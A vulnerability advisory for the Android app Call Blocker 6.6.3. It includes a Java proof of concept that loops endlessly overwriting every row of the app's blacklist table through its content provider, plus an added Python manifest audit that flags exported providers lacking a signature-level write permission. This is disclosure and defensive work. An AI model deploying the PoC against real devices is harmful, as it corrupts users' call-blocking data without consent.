Vendor: Fiorenza Francesco (https://www.call-blocker.info/)
Affected product: Call Blocker (com.cuiet.blockCalls)
Version: 6.6.3
Download link: https://play.google.com/store/apps/details?id=com.cuiet.blockCalls
Description of the vulnerability for use in the CVE: The Call Blocker application 6.6.3 for Android allows attackers to tamper with feature-related data, resulting in a severe elevation of privilege attack.
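PoC:
import android.content.ContentResolver;
import android.content.ContentValues;
import android.net.Uri;

// Method of a Context subclass (it calls this.getApplicationContext()).
public void attack() {
    ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
    while (true) {
        // Blacklist table behind Call Blocker's content provider authority.
        Uri uri = Uri.parse("content://com.cuiet.blockCalls.ContProvBlockCalls/tbBlackList");
        ContentValues contentValues = new ContentValues();
        contentValues.put("photo_uri", "123456789");
        contentValues.put("numeroContatto", "987654321");
        // No selection clause is passed with the update.
        contentResolver.update(uri, contentValues, null, null);
    }
}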
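A manifest check a developer or reviewer can run against a decoded AndroidManifest.xml to catch this class of exposure, as an added example that is not part of the original advisory or the app's code. It assumes the update succeeds because the provider is exported without a write permission, which the advisory does not state; the sample manifest is constructed, and only the first authority string is taken from the PoC URI.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed manifest, not the app's real one. Only the first authority comes
# from the PoC URI; class names and permissions are hypothetical.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android">
  <uses-sdk android:targetSdkVersion="30"/>
  <permission android:name="com.example.WEAK" android:protectionLevel="normal"/>
  <permission android:name="com.example.SIG" android:protectionLevel="signature"/>
  <application>
    <provider android:name=".OpenProvider" android:exported="true"
        android:authorities="com.cuiet.blockCalls.ContProvBlockCalls"/>
    <provider android:name=".WeakProvider" android:exported="true"
        android:authorities="com.example.weak"
        android:writePermission="com.example.WEAK"/>
    <provider android:name=".SigProvider" android:exported="true"
        android:authorities="com.example.sig" android:permission="com.example.SIG"/>
    <provider android:name=".PrivateProvider"
        android:authorities="com.example.private"/>
  </application>
</manifest>"""


def audit_provider_writes(manifest_xml):
    """Return (authority, finding) for providers other apps may be able to write."""
    root = ET.fromstring(manifest_xml)
    sdk = root.find("uses-sdk")
    # Simplification: a missing targetSdkVersion is treated as a legacy target.
    target = int(sdk.get(ANDROID + "targetSdkVersion", "1")) if sdk is not None else 1
    levels = {p.get(ANDROID + "name"): p.get(ANDROID + "protectionLevel", "normal")
              for p in root.findall("permission")}
    findings = []
    for prov in root.iter("provider"):
        exported = prov.get(ANDROID + "exported")
        # With no explicit attribute, providers are exported only for targets <= 16.
        if not (exported == "true" if exported is not None else target <= 16):
            continue
        # writePermission takes precedence over the general android:permission.
        guard = prov.get(ANDROID + "writePermission") or prov.get(ANDROID + "permission")
        authority = prov.get(ANDROID + "authorities")
        if not guard:
            findings.append((authority, "exported with no write permission"))
        elif "signature" not in levels.get(guard, "unknown"):
            findings.append((authority, "write permission not declared signature-level"))
    return findings
```

The check does not look at path-permission or grant-uri-permission elements, and a provider can still enforce caller checks in code, so a finding is a prompt for review rather than proof of exposure.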